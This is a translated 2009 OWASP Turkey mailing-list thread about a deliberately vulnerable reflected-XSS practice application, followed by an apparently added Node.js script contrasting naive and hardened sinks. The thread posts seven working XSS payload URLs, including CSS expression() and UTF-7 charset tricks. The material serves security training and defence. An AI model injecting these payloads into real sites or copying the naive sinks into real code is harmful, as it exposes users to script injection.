[Owasp-turkey] Reflected XSS Playground and Contest

Çağdaş EMEK keramet at gmail.com
Thu Jun 18 05:11:33 EDT 2009


Hello,

The DVD reached me; its contents are very nice. It has been a good resource
for me.
Thank you very much.

Best regards,

2009/6/16 Bedirhan Urgun <bedirhanurgun at gmail.com>

> I have updated the application so that it also includes hints.
>
> http://www.webguvenligi.org/xsstb/reflected.php
>
>
>
> On Tuesday, 16 June 2009 at 09:30, Huzeyfe ONAL <huzeyfe at lifeoverip.net> wrote:
>
>> Greetings,
>>
>>
>> A few tools I tried with default settings also failed to find some of them.
>> This is actually an important piece of work in that it shows how effective
>> automated tools/methods can be.
>>
>> But the rate at which the XSS cases here occur in today's applications also
>> matters a lot. That is, tool authors probably don't want to do a mountain of
>> extra work for a 1% chance of a find.
>>
>>
>>
>> ---
>> Huzeyfe ONAL
>> Have you subscribed to the Network Security list?
>> http://blog.lifeoverip.net/netsec-listesi/
>>
>> ---
>>
>>
>> 2009/6/16 Bedirhan Urgun <bedirhanurgun at gmail.com>
>>
>>> Thanks, Sertan. Congratulations; your explanations with references are
>>> especially useful. If you and Cagdas send me your addresses privately, I
>>> will send the gifts.
>>>
>>> By the way, I am curious whether you know of an automated tool that finds
>>> all of them (without false positives). The ones I tried always miss 1-2
>>> (sometimes even 3).
>>>
>>> On Tuesday, 16 June 2009 at 00:23, Sertan Kolat <sertan at mlists.olympos.org> wrote:
>>>
>>>> Hello,
>>>>
>>>>
>>>> Very nice application, well done.
>>>>
>>>>
>>>> 1) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector1=<script>alert(1)</script>a
>>>>
>>>> 2) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector2="><script>alert(1)</script>a
>>>>
>>>> 3) (IE6)
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector3=background-image:url(javascript:alert(1))
>>>>
>>>> or (IE8)
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector3=width:expression(alert(1))
>>>> ;
>>>>
>>>> 4) (FF3)
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector4=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
>>>>
>>>> 5) (FF3)
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector5=%3Ciframe%20src=javascript:alert(1)%3E
>>>>
>>>> 6) (IE7, encoding auto-select[1])
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector6=%2bADw-script%2bAD4-%0d%0aalert(1)%2bADw-%2fscript%2bAD4-
>>>>
>>>> 7) (IE6)
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector7=blue;background-image:url(javascript:alert(1))
>>>>
>>>>
>>>>
>>>> [1] IE charset encoding Auto-Selection:
>>>>
>>>> If 'Encoding' is set to 'Auto-Select', and Internet-Explorer finds a
>>>> UTF-7 string in the first 4096 characters of the response's body, it will
>>>> set the charset encoding to UTF-7 automatically, unless a certain charset
>>>> encoding is already enforced.
>>>>
>>>>
>>>>
>>>> Sertan Kolat
>>>>
>>>>
>>>> On Monday, June 15, 2009, 1:06:17 PM, you wrote:
>>>>
>>>> Hello,
>>>>
>>>> You can reach a "playground" application, where you can learn and practice
>>>> different reflected XSS techniques, at
>>>> http://www.webguvenligi.org/xsstb/reflected.php
>>>>
>>>> The application has XSS attack vectors that can be applied to 7 parameters
>>>> (vector1, vector2, ..., vector7). To the first two people who exploit these
>>>> vectors and send them, as a reply-all to this mail, in the form of the link
>>>> I give below:
>>>>
>>>>
>>>>
>>>> 1st: a 7-day, 7-night trip for two to the Maldives
>>>>
>>>> 2nd: a brand-new car
>>>>
>>>>
>>>>
>>>> Yeah, right!...
>>>>
>>>>
>>>>
>>>> 1st: an OWASP Membership T-shirt (L)
>>>>
>>>> 2nd: the OWASP Membership DVD
>>>>
>>>>
>>>>
>>>> I will send.
>>>>
>>>>
>>>>
>>>> Example (the first hint is on me):
>>>>
>>>>
>>>> http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E
>>>>
>>>>
>>>>
>>>>
>>>>
>>>> Note 1: it is enough to display an alert box containing 1 on the screen
>>>>
>>>> Note 2: what matters is the order of arrival in the owasp-tr mail archives
>>>>
>>>> Note 3: the last gifts I wrote are the valid ones! No "oh, I didn't see
>>>> that" afterwards
>>>>
>>>>
>>>>
>>>> Project post:
>>>> http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html
>>>>
>>>> --
>>>>
>>>> Bedirhan Urgun
>>>>
>>>> http://www.webguvenligi.org
>>>>
>>>> http://www.owasp.org/index.php/Turkey
>>>>
>>>>
>>>> To subscribe to the Turkish Web Application Security mailing list:
>>>>
>>>> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>>>>
>>>
>>>
>>>
>>>
>>> _______________________________________________
>>> Owasp-turkey mailing list
>>> Owasp-turkey at lists.owasp.org
>>> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>>>
>>>
>>
>>
>>
>
>
>
>
>


-- 
Çağdaş Emek
Software Engineer
http://www.linkedin.com/in/keramet
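The seven vectors posted in the thread each target a different reflection context (HTML body, a quoted attribute, a style attribute, the inside of a script block, a blacklist filter, an undeclared charset that IE7 may auto-select as UTF-7, and a CSS value). The following Node.js script is an added example, not code from reflected.php (whose sinks the thread does not show): it models one assumed sink per vector in a naive and a hardened form, includes a small UTF-7 decoder that shows what an auto-selecting browser makes of vector6, and uses a crude marker-counting oracle to tell which versions the posted payloads break out of. The sink templates, the oracle, the benign value 'x' and the charset handling are assumptions of the example; the payloads are the ones posted, URL-decoded.

```javascript
// Added example, not code from reflected.php. Each sink below is an assumed
// reflection context chosen to match one of the posted payloads.
// Payloads from the thread, URL-decoded (vector3 is the IE6 variant):
const VECTORS = {
  vector1: '<script>alert(1)</script>a',
  vector2: '"><script>alert(1)</script>a',
  vector3: 'background-image:url(javascript:alert(1))',
  vector4: '</script><script>alert(1);</script>',
  vector5: '<iframe src=javascript:alert(1)>',
  vector6: '+ADw-script+AD4-\r\nalert(1)+ADw-/script+AD4-',
  vector7: 'blue;background-image:url(javascript:alert(1))',
};

// Minimal UTF-7 (RFC 2152) decoder: a "+<modified base64>-" run carries
// UTF-16BE code units; a bare "+-" is a literal plus sign.
const B64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
function utf7Decode(s) {
  let out = '';
  for (let i = 0; i < s.length; ) {
    if (s[i] !== '+') { out += s[i++]; continue; }
    i++;
    if (s[i] === '-') { out += '+'; i++; continue; }
    let bits = 0, nbits = 0;
    while (i < s.length && B64.includes(s[i])) {
      bits = (bits << 6) | B64.indexOf(s[i++]);
      nbits += 6;
      if (nbits >= 16) {
        nbits -= 16;
        out += String.fromCharCode((bits >> nbits) & 0xffff);
        bits &= (1 << nbits) - 1;
      }
    }
    if (s[i] === '-') i++; // the run terminator is consumed, not emitted
  }
  return out;
}

// Output encoders, one per context; encoding for the wrong context is what
// lets vector2 (attribute) and vector4 (script body) through.
const HTML_ESC = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
const encodeHtml = s => s.replace(/[&<>"']/g, c => HTML_ESC[c]);
// Inside a JS string literal, \uXXXX every non-alphanumeric character so that
// neither a quote nor "</script>" can close the context.
const encodeJsString = s =>
  s.replace(/[^A-Za-z0-9]/g, c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
// CSS values: escaping cannot neutralise url(javascript:) or expression(),
// so accept only an allow-listed shape and fall back otherwise.
const safeCssColor = s => (/^(#[0-9a-fA-F]{3,6}|[a-zA-Z]{1,20})$/.test(s) ? s : 'inherit');

// Naive sinks: raw reflection, quote-escaping only, a "<script" blacklist, or
// correct HTML encoding served with no declared charset (the UTF-7 case).
const NAIVE = {
  vector1: v => ({ body: `<p>${v}</p>` }),
  vector2: v => ({ body: `<input value="${v}">` }),
  vector3: v => ({ body: `<div style="${v}">x</div>` }),
  vector4: v => ({ body: `<script>var q = "${v.replace(/"/g, '\\"')}";</script>` }),
  vector5: v => ({ body: `<p>${v.replace(/<script/gi, '')}</p>` }),
  vector6: v => ({ body: `<p>${encodeHtml(v)}</p>` }),
  vector7: v => ({ body: `<div style="color:${v}">x</div>` }),
};

// Hardened sinks: encode for the exact context, allow-list CSS, pin the charset.
const utf8 = body => ({ charset: 'UTF-8', body });
const HARDENED = {
  vector1: v => utf8(`<p>${encodeHtml(v)}</p>`),
  vector2: v => utf8(`<input value="${encodeHtml(v)}">`),
  vector3: v => utf8(`<div style="background-color:${safeCssColor(v)}">x</div>`),
  vector4: v => utf8(`<script>var q = "${encodeJsString(v)}";</script>`),
  vector5: v => utf8(`<p>${encodeHtml(v)}</p>`),
  vector6: v => utf8(`<p>${encodeHtml(v)}</p>`),
  vector7: v => utf8(`<div style="color:${safeCssColor(v)}">x</div>`),
};

// Crude oracle: count active-content markers the payload adds beyond those the
// page template already contains. With no pinned charset the body is also read
// as UTF-7, as an auto-selecting IE7 would read it.
const MARKERS = /<script\b|<iframe\b|url\(\s*javascript:|expression\(/gi;
const countMarkers = s => (s.match(MARKERS) || []).length;
function markerCount(resp) {
  const direct = countMarkers(resp.body);
  return resp.charset ? direct : Math.max(direct, countMarkers(utf7Decode(resp.body)));
}
function isExploitable(sink, payload) {
  return markerCount(sink(payload)) > markerCount(sink('x'));
}
function assess(sinks) {
  return Object.fromEntries(
    Object.keys(VECTORS).map(name => [name, isExploitable(sinks[name], VECTORS[name])]));
}

console.log('naive:', assess(NAIVE));       // every vector: true
console.log('hardened:', assess(HARDENED)); // every vector: false
```

Run it with `node`. The oracle is a string-level approximation, not a browser: it flags the IE-only payloads (the `url(javascript:)` and `expression()` vectors) by their markers regardless of which browser would actually execute them, and it only recognises UTF-7 when no charset is pinned, which is the condition Sertan's note [1] describes. The point the hardened sinks make is that the fix differs per context: HTML encoding for vector1/2/5, a JavaScript-string encoding (not HTML encoding) for vector4, an allow-list rather than escaping for the CSS sinks, and an explicit charset for vector6, where the encoding was already correct.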